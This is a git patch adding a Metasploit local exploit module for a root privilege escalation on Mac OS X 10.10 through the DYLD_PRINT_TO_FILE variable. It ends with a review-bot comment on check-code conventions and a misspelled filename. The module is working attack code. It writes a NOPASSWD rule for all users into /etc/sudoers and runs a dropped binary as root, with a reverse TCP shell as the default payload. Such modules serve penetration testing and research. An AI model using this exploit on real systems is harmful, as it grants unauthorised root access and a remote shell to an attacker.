From 3013ab472440f77df971884e48c6d13ea4fac81c Mon Sep 17 00:00:00 2001
From: joev
Date: Tue, 21 Jul 2015 21:43:51 -0500
Subject: [PATCH] Add osx root privilege escalation.
---
 .../osx/local/dlyd_print_to_file_root.rb | 86 +++++++++++++++++++
 1 file changed, 86 insertions(+)
 create mode 100644 modules/exploits/osx/local/dlyd_print_to_file_root.rb
diff --git a/modules/exploits/osx/local/dlyd_print_to_file_root.rb b/modules/exploits/osx/local/dlyd_print_to_file_root.rb
new file mode 100644
index 0000000000..8a68275e8f
--- /dev/null
+++ b/modules/exploits/osx/local/dlyd_print_to_file_root.rb
@@ -0,0 +1,86 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Local
+
+ Rank = GreatRanking
+
+ include Msf::Post::OSX::System
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation',
+ 'Description' => %q{
+ In Mac OS X 10.10.x, the DYLD_PRINT_TO_FILE environment variable is still
+ supported for suid binaries. This allows an arbitrary file write as root.
+ },
+ 'Author' => [
+ 'Stefan Esser', # Vulnerability discovery and PoC
+ 'joev' # Copy/paste monkey
+ ],
+ 'References' => [
+ ['URL', 'https://www.sektioneins.de/en/blog/15-07-07-dyld_print_to_file_lpe.html']
+ ],
+ 'DisclosureDate' => 'Jul 21 2015',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X86_64,
+ 'SessionTypes' => ['shell'],
+ 'Privileged' => true,
+ 'Targets' => [
+ ['Mac OS X 10.10-10.10.4', {}]
+ ],
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'osx/x64/shell_reverse_tcp'
+ }
+ ))
+
+ register_options([
+ OptString.new('PYTHON', [true, 'Python executable', '/usr/bin/python']),
+ OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
+ ])
+ end
+
+ def exploit
+ print_status("Writing payload to `#{payload_file}'")
+ write_file(payload_file, binary_payload)
+ register_file_for_cleanup(payload_file)
+ cmd_exec("chmod +x #{payload_file}")
+
+ print_status("Executing exploit at #{payload_file}...")
+ cmd_exec(sploit)
+ end
+
+ def check
+ (ver?) ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
+ end
+
+ def ver?
+ Gem::Version.new(get_sysinfo['ProductVersion']).between?(
+ Gem::Version.new('10.10.0'), Gem::Version.new('10.10.4')
+ )
+ end
+
+ def sploit
+ %Q|#{datastore['PYTHON']} -c \\'"import os;os.write(3,\\"ALL ALL=|+
+ %Q|(ALL) NOPASSWD: ALL\\")"\\'\|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;|+
+ %Q|/bin/sh -c 'sudo #{payload_file} &'|
+ end
+
+ def binary_payload
+ Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
+ end
+
+ def payload_file
+ @payload_file ||=
+ "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
+ end
+
+end
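Review bot: `check` reports `CheckCode::Vulnerable` on the strength of `ver?` alone, which only compares `get_sysinfo['ProductVersion']` against the 10.10.0–10.10.4 range; under the framework's check-code convention a version-only test should report `CheckCode::Appears`, and a missing `ProductVersion` — which here goes straight into `Gem::Version.new`, whose handling of nil is a deprecated path that warns or raises depending on the rubygems version — is better reported as `CheckCode::Unknown` than compared as an empty version. Something like `return Exploit::CheckCode::Unknown if get_sysinfo['ProductVersion'].to_s.empty?` followed by `ver? ? Exploit::CheckCode::Appears : Exploit::CheckCode::Safe` covers both (the parentheses around `ver?` are redundant). Separately, the new file is named `dlyd_print_to_file_root.rb` while the module name and the reference URL read `DYLD_PRINT_TO_FILE` / `dyld_print_to_file`; that looks like a transposition, and renaming the module to `dyld_print_to_file_root.rb` before merge would avoid a confusing path for anyone searching by the variable name.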